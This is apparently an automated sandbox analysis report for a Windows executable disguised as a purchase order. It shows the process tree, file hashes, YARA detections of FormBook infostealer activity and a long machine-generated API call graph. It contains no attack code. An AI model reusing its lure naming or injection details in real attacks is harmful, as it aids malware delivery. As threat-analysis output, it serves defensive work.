                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZhdR9PY6ImYDVp3yxFsS%2F9eD96c5kcCAyZC71xPogWeCoVVIyRSEvZg1JKUmVNBIxfua7m6dR50d%2BFPvxP8cJNAJ49Rs%2FTzm4Lww6vNZp7%2FmyyBY62QhS8fQUkIndC%2BwV5vqId74oUY%2Bj%2B4%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8bd478f178e3c3eb-EWR
                        alt-svc: h3=":443"; ma=86400
                        Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0


                        Target ID:0
                        Start time:04:42:57
                        Start date:03/09/2024
                        Path:C:\Users\user\Desktop\PO_987654345678.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\PO_987654345678.exe"
                        Imagebase:0xf00000
                        File size:1'250'816 bytes
                        MD5 hash:4214BE98801C44F69B60490A3321E940
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:1
                        Start time:04:42:57
                        Start date:03/09/2024
                        Path:C:\Windows\SysWOW64\svchost.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\PO_987654345678.exe"
                        Imagebase:0xcc0000
                        File size:46'504 bytes
                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1850488356.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1850432991.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1850432991.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1850914338.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1850914338.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:04:43:09
                        Start date:03/09/2024
                        Path:C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe"
                        Imagebase:0xfc0000
                        File size:140'800 bytes
                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4118512581.0000000003C50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4118512581.0000000003C50000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:false

                        Target ID:3
                        Start time:04:43:11
                        Start date:03/09/2024
                        Path:C:\Windows\SysWOW64\chkntfs.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\SysWOW64\chkntfs.exe"
                        Imagebase:0xae0000
                        File size:19'968 bytes
                        MD5 hash:A9B42ED1B14BB22EF07CCC8228697408
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4118474326.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4117493334.0000000000980000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4117493334.0000000000980000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4118583359.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4118583359.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        Reputation:low
                        Has exited:false

                        Target ID:7
                        Start time:04:43:24
                        Start date:03/09/2024
                        Path:C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe"
                        Imagebase:0xfc0000
                        File size:140'800 bytes
                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4120389612.0000000005750000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4120389612.0000000005750000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:false

                        Target ID:8
                        Start time:04:43:36
                        Start date:03/09/2024
                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                        Imagebase:0x7ff6bf500000
                        File size:676'768 bytes
                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true


                          Execution Graph

                          Execution Coverage:3.2%
                          Dynamic/Decrypted Code Coverage:1.5%
                          Signature Coverage:3.1%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:50
f1fe0b 22 API calls 95110->95111 95111->95107 95113 f04ec6 95112->95113 95114 f04ea8 GetProcAddress 95112->95114 95117 f2e5eb 95113->95117 95115 f04eb8 95114->95115 95115->95113 95116 f04ebf FreeLibrary 95115->95116 95116->95113 95150 f2e52a 95117->95150 95119 f04eea 95119->95011 95119->95012 95121 f04e8d 95120->95121 95122 f04e6e GetProcAddress 95120->95122 95125 f04f80 95121->95125 95123 f04e7e 95122->95123 95123->95121 95124 f04e86 FreeLibrary 95123->95124 95124->95121 95126 f1fe0b 22 API calls 95125->95126 95127 f04f95 95126->95127 95218 f05722 95127->95218 95129 f04fa1 __fread_nolock 95130 f050a5 95129->95130 95131 f43d1d 95129->95131 95141 f04fdc 95129->95141 95221 f042a2 CreateStreamOnHGlobal 95130->95221 95232 f7304d 74 API calls 95131->95232 95134 f43d22 95136 f0511f 64 API calls 95134->95136 95135 f050f5 40 API calls 95135->95141 95137 f43d45 95136->95137 95138 f050f5 40 API calls 95137->95138 95140 f0506e ISource 95138->95140 95140->95020 95141->95134 95141->95135 95141->95140 95227 f0511f 95141->95227 95143 f43d70 95142->95143 95144 f05107 95142->95144 95254 f2e8c4 95144->95254 95147 f728fe 95396 f7274e 95147->95396 95149 f72919 95149->95027 95153 f2e536 CallCatchBlock 95150->95153 95151 f2e544 95175 f2f2d9 20 API calls __dosmaperr 95151->95175 95153->95151 95154 f2e574 95153->95154 95156 f2e586 95154->95156 95157 f2e579 95154->95157 95155 f2e549 95176 f327ec 26 API calls __cftof 95155->95176 95167 f38061 95156->95167 95177 f2f2d9 20 API calls __dosmaperr 95157->95177 95161 f2e58f 95162 f2e5a2 95161->95162 95163 f2e595 95161->95163 95179 f2e5d4 LeaveCriticalSection __fread_nolock 95162->95179 95178 f2f2d9 20 API calls __dosmaperr 95163->95178 95164 f2e554 __fread_nolock 95164->95119 95168 f3806d CallCatchBlock 95167->95168 95180 f32f5e EnterCriticalSection 95168->95180 95170 f3807b 95181 f380fb 95170->95181 95174 f380ac __fread_nolock 95174->95161 95175->95155 95176->95164 95177->95164 95178->95164 95179->95164 95180->95170 95190 f3811e 95181->95190 
95182 f38177 95199 f34c7d 95182->95199 95187 f38189 95189 f38088 95187->95189 95212 f33405 11 API calls 2 library calls 95187->95212 95194 f380b7 95189->95194 95190->95182 95190->95189 95197 f2918d EnterCriticalSection 95190->95197 95198 f291a1 LeaveCriticalSection 95190->95198 95191 f381a8 95213 f2918d EnterCriticalSection 95191->95213 95217 f32fa6 LeaveCriticalSection 95194->95217 95196 f380be 95196->95174 95197->95190 95198->95190 95204 f34c8a pair 95199->95204 95200 f34cca 95215 f2f2d9 20 API calls __dosmaperr 95200->95215 95201 f34cb5 RtlAllocateHeap 95202 f34cc8 95201->95202 95201->95204 95206 f329c8 95202->95206 95204->95200 95204->95201 95214 f24ead 7 API calls 2 library calls 95204->95214 95207 f329d3 RtlFreeHeap 95206->95207 95208 f329fc __dosmaperr 95206->95208 95207->95208 95209 f329e8 95207->95209 95208->95187 95216 f2f2d9 20 API calls __dosmaperr 95209->95216 95211 f329ee GetLastError 95211->95208 95212->95191 95213->95189 95214->95204 95215->95202 95216->95211 95217->95196 95219 f1fddb 22 API calls 95218->95219 95220 f05734 95219->95220 95220->95129 95222 f042bc FindResourceExW 95221->95222 95226 f042d9 95221->95226 95223 f435ba LoadResource 95222->95223 95222->95226 95224 f435cf SizeofResource 95223->95224 95223->95226 95225 f435e3 LockResource 95224->95225 95224->95226 95225->95226 95226->95141 95228 f43d90 95227->95228 95229 f0512e 95227->95229 95233 f2ece3 95229->95233 95232->95134 95236 f2eaaa 95233->95236 95235 f0513c 95235->95141 95240 f2eab6 CallCatchBlock 95236->95240 95237 f2eac2 95249 f2f2d9 20 API calls __dosmaperr 95237->95249 95239 f2eae8 95251 f2918d EnterCriticalSection 95239->95251 95240->95237 95240->95239 95241 f2eac7 95250 f327ec 26 API calls __cftof 95241->95250 95243 f2eaf4 95252 f2ec0a 62 API calls 2 library calls 95243->95252 95246 f2eb08 95253 f2eb27 LeaveCriticalSection __fread_nolock 95246->95253 95248 f2ead2 __fread_nolock 95248->95235 95249->95241 95250->95248 95251->95243 95252->95246 95253->95248 95257 f2e8e1 
95254->95257 95256 f05118 95256->95147 95258 f2e8ed CallCatchBlock 95257->95258 95259 f2e92d 95258->95259 95260 f2e925 __fread_nolock 95258->95260 95262 f2e900 ___scrt_fastfail 95258->95262 95270 f2918d EnterCriticalSection 95259->95270 95260->95256 95284 f2f2d9 20 API calls __dosmaperr 95262->95284 95263 f2e937 95271 f2e6f8 95263->95271 95265 f2e91a 95285 f327ec 26 API calls __cftof 95265->95285 95270->95263 95273 f2e70a ___scrt_fastfail 95271->95273 95277 f2e727 95271->95277 95272 f2e717 95359 f2f2d9 20 API calls __dosmaperr 95272->95359 95273->95272 95273->95277 95280 f2e76a __fread_nolock 95273->95280 95275 f2e71c 95360 f327ec 26 API calls __cftof 95275->95360 95286 f2e96c LeaveCriticalSection __fread_nolock 95277->95286 95278 f2e886 ___scrt_fastfail 95362 f2f2d9 20 API calls __dosmaperr 95278->95362 95280->95277 95280->95278 95287 f2d955 95280->95287 95294 f38d45 95280->95294 95361 f2cf78 26 API calls 4 library calls 95280->95361 95284->95265 95285->95260 95286->95260 95288 f2d961 95287->95288 95289 f2d976 95287->95289 95363 f2f2d9 20 API calls __dosmaperr 95288->95363 95289->95280 95291 f2d966 95364 f327ec 26 API calls __cftof 95291->95364 95293 f2d971 95293->95280 95295 f38d57 95294->95295 95296 f38d6f 95294->95296 95374 f2f2c6 20 API calls __dosmaperr 95295->95374 95298 f390d9 95296->95298 95301 f38db4 95296->95301 95390 f2f2c6 20 API calls __dosmaperr 95298->95390 95299 f38d5c 95375 f2f2d9 20 API calls __dosmaperr 95299->95375 95304 f38dbf 95301->95304 95307 f38d64 95301->95307 95312 f38def 95301->95312 95303 f390de 95391 f2f2d9 20 API calls __dosmaperr 95303->95391 95376 f2f2c6 20 API calls __dosmaperr 95304->95376 95307->95280 95308 f38dcc 95392 f327ec 26 API calls __cftof 95308->95392 95309 f38dc4 95377 f2f2d9 20 API calls __dosmaperr 95309->95377 95313 f38e08 95312->95313 95314 f38e4a 95312->95314 95315 f38e2e 95312->95315 95313->95315 95321 f38e15 95313->95321 95381 f33820 21 API calls 2 library calls 95314->95381 95378 f2f2c6 20 API calls __dosmaperr 
95315->95378 95317 f38e33 95379 f2f2d9 20 API calls __dosmaperr 95317->95379 95365 f3f89b 95321->95365 95322 f38e61 95325 f329c8 _free 20 API calls 95322->95325 95323 f38e3a 95380 f327ec 26 API calls __cftof 95323->95380 95324 f38fb3 95327 f39029 95324->95327 95330 f38fcc GetConsoleMode 95324->95330 95328 f38e6a 95325->95328 95329 f3902d ReadFile 95327->95329 95331 f329c8 _free 20 API calls 95328->95331 95332 f390a1 GetLastError 95329->95332 95333 f39047 95329->95333 95330->95327 95334 f38fdd 95330->95334 95335 f38e71 95331->95335 95336 f39005 95332->95336 95337 f390ae 95332->95337 95333->95332 95338 f3901e 95333->95338 95334->95329 95339 f38fe3 ReadConsoleW 95334->95339 95340 f38e96 95335->95340 95341 f38e7b 95335->95341 95356 f38e45 __fread_nolock 95336->95356 95385 f2f2a3 20 API calls __dosmaperr 95336->95385 95388 f2f2d9 20 API calls __dosmaperr 95337->95388 95352 f39083 95338->95352 95353 f3906c 95338->95353 95338->95356 95339->95338 95344 f38fff GetLastError 95339->95344 95384 f39424 28 API calls __wsopen_s 95340->95384 95382 f2f2d9 20 API calls __dosmaperr 95341->95382 95344->95336 95345 f329c8 _free 20 API calls 95345->95307 95347 f38e80 95383 f2f2c6 20 API calls __dosmaperr 95347->95383 95348 f390b3 95389 f2f2c6 20 API calls __dosmaperr 95348->95389 95355 f3909a 95352->95355 95352->95356 95386 f38a61 31 API calls 3 library calls 95353->95386 95387 f388a1 29 API calls __wsopen_s 95355->95387 95356->95345 95358 f3909f 95358->95356 95359->95275 95360->95277 95361->95280 95362->95275 95363->95291 95364->95293 95366 f3f8b5 95365->95366 95367 f3f8a8 95365->95367 95369 f3f8c1 95366->95369 95394 f2f2d9 20 API calls __dosmaperr 95366->95394 95393 f2f2d9 20 API calls __dosmaperr 95367->95393 95369->95324 95371 f3f8ad 95371->95324 95372 f3f8e2 95395 f327ec 26 API calls __cftof 95372->95395 95374->95299 95375->95307 95376->95309 95377->95308 95378->95317 95379->95323 95380->95356 95381->95322 95382->95347 95383->95356 95384->95321 95385->95356 95386->95356 
95387->95358 95388->95348 95389->95356 95390->95303 95391->95308 95392->95307 95393->95371 95394->95372 95395->95371 95399 f2e4e8 95396->95399 95398 f7275d 95398->95149 95402 f2e469 95399->95402 95401 f2e505 95401->95398 95403 f2e478 95402->95403 95404 f2e48c 95402->95404 95410 f2f2d9 20 API calls __dosmaperr 95403->95410 95409 f2e488 __alldvrm 95404->95409 95412 f3333f 11 API calls 2 library calls 95404->95412 95406 f2e47d 95411 f327ec 26 API calls __cftof 95406->95411 95409->95401 95410->95406 95411->95409 95412->95409 95417 f72e7a 95413->95417 95414 f728fe 27 API calls 95414->95417 95415 f72d3b 95415->95050 95415->95067 95416 f050f5 40 API calls 95416->95417 95417->95414 95417->95415 95417->95416 95418 f0511f 64 API calls 95417->95418 95418->95417 95420 f722d9 95419->95420 95421 f722e7 95419->95421 95422 f2e5eb 29 API calls 95420->95422 95423 f7232c 95421->95423 95424 f2e5eb 29 API calls 95421->95424 95435 f722f0 95421->95435 95422->95421 95448 f72557 95423->95448 95426 f72311 95424->95426 95426->95423 95428 f7231a 95426->95428 95427 f72370 95429 f72395 95427->95429 95430 f72374 95427->95430 95432 f2e678 67 API calls 95428->95432 95428->95435 95452 f72171 95429->95452 95431 f72381 95430->95431 95434 f2e678 67 API calls 95430->95434 95431->95435 95437 f2e678 67 API calls 95431->95437 95432->95435 95434->95431 95435->95067 95436 f7239d 95438 f723c3 95436->95438 95439 f723a3 95436->95439 95437->95435 95459 f723f3 95438->95459 95440 f723b0 95439->95440 95442 f2e678 67 API calls 95439->95442 95440->95435 95443 f2e678 67 API calls 95440->95443 95442->95440 95443->95435 95444 f723ca 95445 f723de 95444->95445 95467 f2e678 95444->95467 95445->95435 95447 f2e678 67 API calls 95445->95447 95447->95435 95449 f7257c 95448->95449 95451 f72565 __fread_nolock 95448->95451 95450 f2e8c4 __fread_nolock 40 API calls 95449->95450 95450->95451 95451->95427 95453 f2ea0c ___std_exception_copy 21 API calls 95452->95453 95454 f7217f 95453->95454 95455 f2ea0c ___std_exception_copy 21 API 
calls 95454->95455 95456 f72190 95455->95456 95457 f2ea0c ___std_exception_copy 21 API calls 95456->95457 95458 f7219c 95457->95458 95458->95436 95466 f72408 95459->95466 95460 f724c0 95484 f72724 95460->95484 95462 f721cc 40 API calls 95462->95466 95463 f724c7 95463->95444 95466->95460 95466->95462 95466->95463 95480 f72606 95466->95480 95488 f72269 40 API calls 95466->95488 95468 f2e684 CallCatchBlock 95467->95468 95469 f2e695 95468->95469 95470 f2e6aa 95468->95470 95562 f2f2d9 20 API calls __dosmaperr 95469->95562 95477 f2e6a5 __fread_nolock 95470->95477 95545 f2918d EnterCriticalSection 95470->95545 95473 f2e69a 95563 f327ec 26 API calls __cftof 95473->95563 95474 f2e6c6 95546 f2e602 95474->95546 95477->95445 95478 f2e6d1 95564 f2e6ee LeaveCriticalSection __fread_nolock 95478->95564 95481 f72617 95480->95481 95482 f7261d 95480->95482 95481->95482 95489 f726d7 95481->95489 95482->95466 95485 f72731 95484->95485 95486 f72742 95484->95486 95487 f2dbb3 65 API calls 95485->95487 95486->95463 95487->95486 95488->95466 95490 f72703 95489->95490 95491 f72714 95489->95491 95493 f2dbb3 95490->95493 95491->95481 95494 f2dbc1 95493->95494 95495 f2dbdd 95493->95495 95494->95495 95496 f2dbe3 95494->95496 95497 f2dbcd 95494->95497 95495->95491 95502 f2d9cc 95496->95502 95505 f2f2d9 20 API calls __dosmaperr 95497->95505 95500 f2dbd2 95506 f327ec 26 API calls __cftof 95500->95506 95507 f2d97b 95502->95507 95505->95500 95506->95495 95508 f2d987 CallCatchBlock 95507->95508 95515 f2918d EnterCriticalSection 95508->95515 95510 f2d995 95516 f2d9f4 95510->95516 95515->95510 95524 f349a1 95516->95524 95525 f2d955 __fread_nolock 26 API calls 95524->95525 95526 f349b0 95525->95526 95527 f3f89b __fread_nolock 26 API calls 95526->95527 95528 f349b6 95527->95528 95529 f33820 __fread_nolock 21 API calls 95528->95529 95532 f2da09 95528->95532 95530 f34a15 95529->95530 95531 f329c8 _free 20 API calls 95530->95531 95531->95532 95533 f2da3a 95532->95533 95534 f2da4c 95533->95534 95541 f2da24 
95533->95541 95535 f2da5a 95534->95535 95537 f2da85 __fread_nolock 95534->95537 95534->95541 95540 f2dc0b 62 API calls 95537->95540 95537->95541 95542 f2d955 __fread_nolock 26 API calls 95537->95542 95543 f359be __wsopen_s 62 API calls 95537->95543 95540->95537 95544 f34a56 62 API calls 95541->95544 95542->95537 95543->95537 95545->95474 95547 f2e624 95546->95547 95548 f2e60f 95546->95548 95553 f2e61f 95547->95553 95565 f2dc0b 95547->95565 95590 f2f2d9 20 API calls __dosmaperr 95548->95590 95551 f2e614 95591 f327ec 26 API calls __cftof 95551->95591 95553->95478 95557 f2d955 __fread_nolock 26 API calls 95558 f2e646 95557->95558 95575 f3862f 95558->95575 95561 f329c8 _free 20 API calls 95561->95553 95562->95473 95563->95477 95564->95477 95566 f2dc1f 95565->95566 95567 f2dc23 95565->95567 95571 f34d7a 95566->95571 95567->95566 95568 f2d955 __fread_nolock 26 API calls 95567->95568 95569 f2dc43 95568->95569 95592 f359be 95569->95592 95572 f34d90 95571->95572 95573 f2e640 95571->95573 95572->95573 95574 f329c8 _free 20 API calls 95572->95574 95573->95557 95574->95573 95576 f38653 95575->95576 95577 f3863e 95575->95577 95579 f3868e 95576->95579 95583 f3867a 95576->95583 95715 f2f2c6 20 API calls __dosmaperr 95577->95715 95717 f2f2c6 20 API calls __dosmaperr 95579->95717 95580 f38643 95716 f2f2d9 20 API calls __dosmaperr 95580->95716 95712 f38607 95583->95712 95584 f38693 95718 f2f2d9 20 API calls __dosmaperr 95584->95718 95587 f2e64c 95587->95553 95587->95561 95588 f3869b 95590->95551 95591->95553 95593 f359ca CallCatchBlock 95592->95593 95594 f359d2 95593->95594 95597 f359ea 95593->95597 95671 f2f2c6 20 API calls __dosmaperr 95594->95671 95595 f35a88 95676 f2f2c6 20 API calls __dosmaperr 95595->95676 95597->95595 95600 f35a1f 95597->95600 95599 f359d7 95672 f2f2d9 20 API calls __dosmaperr 95599->95672 95617 f35147 EnterCriticalSection 95600->95617 95601 f35a8d 95677 f2f2d9 20 API calls __dosmaperr 95601->95677 95605 f35a25 95607 f35a41 95605->95607 95608 f35a56 
95605->95608 95606 f35a95 95678 f327ec 26 API calls __cftof 95606->95678 95673 f2f2d9 20 API calls __dosmaperr 95607->95673 95618 f35aa9 95608->95618 95611 f359df __fread_nolock 95611->95566 95613 f35a46 95617->95605 95619 f35ad7 95618->95619 95658 f35ad0 95618->95658 95620 f35adb 95619->95620 95621 f35afa 95619->95621 95671->95599 95672->95611 95673->95613 95676->95601 95677->95606 95678->95611 95720 f38585 95712->95720 95715->95580 95716->95587 95717->95584 95718->95588 95721 f38591 CallCatchBlock 95720->95721 95731 f35147 EnterCriticalSection 95721->95731 95723 f3859f 95731->95723 95769 f5d8dd GetTempPathW 95770 f5d8fa 95769->95770 95771 f01098 95776 f042de 95771->95776 95775 f010a7 95777 f0a961 22 API calls 95776->95777 95778 f042f5 GetVersionExW 95777->95778 95779 f06b57 22 API calls 95778->95779 95780 f04342 95779->95780 95781 f093b2 22 API calls 95780->95781 95791 f04378 95780->95791 95782 f0436c 95781->95782 95784 f037a0 22 API calls 95782->95784 95783 f0441b GetCurrentProcess IsWow64Process 95785 f04437 95783->95785 95784->95791 95786 f43824 GetSystemInfo 95785->95786 95787 f0444f LoadLibraryA 95785->95787 95788 f04460 GetProcAddress 95787->95788 95789 f0449c GetSystemInfo 95787->95789 95788->95789 95793 f04470 GetNativeSystemInfo 95788->95793 95790 f04476 95789->95790 95794 f0109d 95790->95794 95795 f0447a FreeLibrary 95790->95795 95791->95783 95792 f437df 95791->95792 95793->95790 95796 f200a3 29 API calls __onexit 95794->95796 95795->95794 95796->95775 95797 f390fa 95798 f39107 95797->95798 95803 f3911f 95797->95803 95847 f2f2d9 20 API calls __dosmaperr 95798->95847 95800 f3910c 95848 f327ec 26 API calls __cftof 95800->95848 95802 f39117 95803->95802 95804 f3917a 95803->95804 95849 f3fdc4 21 API calls 2 library calls 95803->95849 95806 f2d955 __fread_nolock 26 API calls 95804->95806 95807 f39192 95806->95807 95817 f38c32 95807->95817 95809 f39199 95809->95802 95810 f2d955 __fread_nolock 26 API calls 95809->95810 95811 f391c5 95810->95811 95811->95802 
95812 f2d955 __fread_nolock 26 API calls 95811->95812 95813 f391d3 95812->95813 95813->95802 95814 f2d955 __fread_nolock 26 API calls 95813->95814 95815 f391e3 95814->95815 95816 f2d955 __fread_nolock 26 API calls 95815->95816 95816->95802 95818 f38c3e CallCatchBlock 95817->95818 95819 f38c46 95818->95819 95820 f38c5e 95818->95820 95851 f2f2c6 20 API calls __dosmaperr 95819->95851 95822 f38d24 95820->95822 95827 f38c97 95820->95827 95858 f2f2c6 20 API calls __dosmaperr 95822->95858 95823 f38c4b 95852 f2f2d9 20 API calls __dosmaperr 95823->95852 95825 f38d29 95859 f2f2d9 20 API calls __dosmaperr 95825->95859 95829 f38ca6 95827->95829 95830 f38cbb 95827->95830 95853 f2f2c6 20 API calls __dosmaperr 95829->95853 95850 f35147 EnterCriticalSection 95830->95850 95832 f38cb3 95860 f327ec 26 API calls __cftof 95832->95860 95834 f38cc1 95836 f38cf2 95834->95836 95837 f38cdd 95834->95837 95835 f38cab 95854 f2f2d9 20 API calls __dosmaperr 95835->95854 95842 f38d45 __fread_nolock 38 API calls 95836->95842 95855 f2f2d9 20 API calls __dosmaperr 95837->95855 95839 f38c53 __fread_nolock 95839->95809 95844 f38ced 95842->95844 95843 f38ce2 95856 f2f2c6 20 API calls __dosmaperr 95843->95856 95857 f38d1c LeaveCriticalSection __wsopen_s 95844->95857 95847->95800 95848->95802 95849->95804 95850->95834 95851->95823 95852->95839 95853->95835 95854->95832 95855->95843 95856->95844 95857->95839 95858->95825 95859->95832 95860->95839 95861 f203fb 95862 f20407 CallCatchBlock 95861->95862 95890 f1feb1 95862->95890 95864 f20561 95917 f2083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 95864->95917 95866 f2040e 95866->95864 95868 f20438 95866->95868 95867 f20568 95918 f24e52 28 API calls _abort 95867->95918 95878 f20477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 95868->95878 95901 f3247d 95868->95901 95870 f2056e 95919 f24e04 28 API calls _abort 95870->95919 95874 f20576 95875 f20457 95877 f204d8 95909 
f20959 95877->95909 95878->95877 95913 f24e1a 38 API calls 3 library calls 95878->95913 95881 f204de 95882 f204f3 95881->95882 95914 f20992 GetModuleHandleW 95882->95914 95884 f204fa 95884->95867 95885 f204fe 95884->95885 95886 f20507 95885->95886 95915 f24df5 28 API calls _abort 95885->95915 95916 f20040 13 API calls 2 library calls 95886->95916 95889 f2050f 95889->95875 95891 f1feba 95890->95891 95920 f20698 IsProcessorFeaturePresent 95891->95920 95893 f1fec6 95921 f22c94 10 API calls 3 library calls 95893->95921 95895 f1fecb 95896 f1fecf 95895->95896 95922 f32317 95895->95922 95896->95866 95899 f1fee6 95899->95866 95902 f32494 95901->95902 95903 f20a8c CatchGuardHandler 5 API calls 95902->95903 95904 f20451 95903->95904 95904->95875 95905 f32421 95904->95905 95906 f32450 95905->95906 95907 f20a8c CatchGuardHandler 5 API calls 95906->95907 95908 f32479 95907->95908 95908->95878 95973 f22340 95909->95973 95912 f2097f 95912->95881 95913->95877 95914->95884 95915->95886 95916->95889 95917->95867 95918->95870 95919->95874 95920->95893 95921->95895 95926 f3d1f6 95922->95926 95925 f22cbd 8 API calls 3 library calls 95925->95896 95929 f3d213 95926->95929 95930 f3d20f 95926->95930 95927 f20a8c CatchGuardHandler 5 API calls 95928 f1fed8 95927->95928 95928->95899 95928->95925 95929->95930 95932 f34bfb 95929->95932 95930->95927 95933 f34c07 CallCatchBlock 95932->95933 95944 f32f5e EnterCriticalSection 95933->95944 95935 f34c0e 95945 f350af 95935->95945 95937 f34c1d 95938 f34c2c 95937->95938 95958 f34a8f 29 API calls 95937->95958 95960 f34c48 LeaveCriticalSection _abort 95938->95960 95941 f34c3d __fread_nolock 95941->95929 95942 f34c27 95959 f34b45 GetStdHandle GetFileType 95942->95959 95944->95935 95946 f350bb CallCatchBlock 95945->95946 95947 f350c8 95946->95947 95948 f350df 95946->95948 95969 f2f2d9 20 API calls __dosmaperr 95947->95969 95961 f32f5e EnterCriticalSection 95948->95961 95951 f350cd 95970 f327ec 26 API calls __cftof 95951->95970 95953 f350d7 __fread_nolock 
95953->95937 95954 f35117 95971 f3513e LeaveCriticalSection _abort 95954->95971 95955 f350eb 95955->95954 95962 f35000 95955->95962 95958->95942 95959->95938 95960->95941 95961->95955 95963 f34c7d pair 20 API calls 95962->95963 95964 f35012 95963->95964 95968 f3501f 95964->95968 95972 f33405 11 API calls 2 library calls 95964->95972 95965 f329c8 _free 20 API calls 95967 f35071 95965->95967 95967->95955 95968->95965 95969->95951 95970->95953 95971->95953 95972->95964 95974 f2096c GetStartupInfoW 95973->95974 95974->95912 95975 f0105b 95980 f0344d 95975->95980 95977 f0106a 96011 f200a3 29 API calls __onexit 95977->96011 95979 f01074 95981 f0345d __wsopen_s 95980->95981 95982 f0a961 22 API calls 95981->95982 95983 f03513 95982->95983 95984 f03a5a 24 API calls 95983->95984 95985 f0351c 95984->95985 96012 f03357 95985->96012 95988 f033c6 22 API calls 95989 f03535 95988->95989 95990 f0515f 22 API calls 95989->95990 95991 f03544 95990->95991 95992 f0a961 22 API calls 95991->95992 95993 f0354d 95992->95993 95994 f0a6c3 22 API calls 95993->95994 95995 f03556 RegOpenKeyExW 95994->95995 95996 f43176 RegQueryValueExW 95995->95996 96000 f03578 95995->96000 95997 f43193 95996->95997 95998 f4320c RegCloseKey 95996->95998 95999 f1fe0b 22 API calls 95997->95999 95998->96000 96010 f4321e _wcslen 95998->96010 96001 f431ac 95999->96001 96000->95977 96002 f05722 22 API calls 96001->96002 96003 f431b7 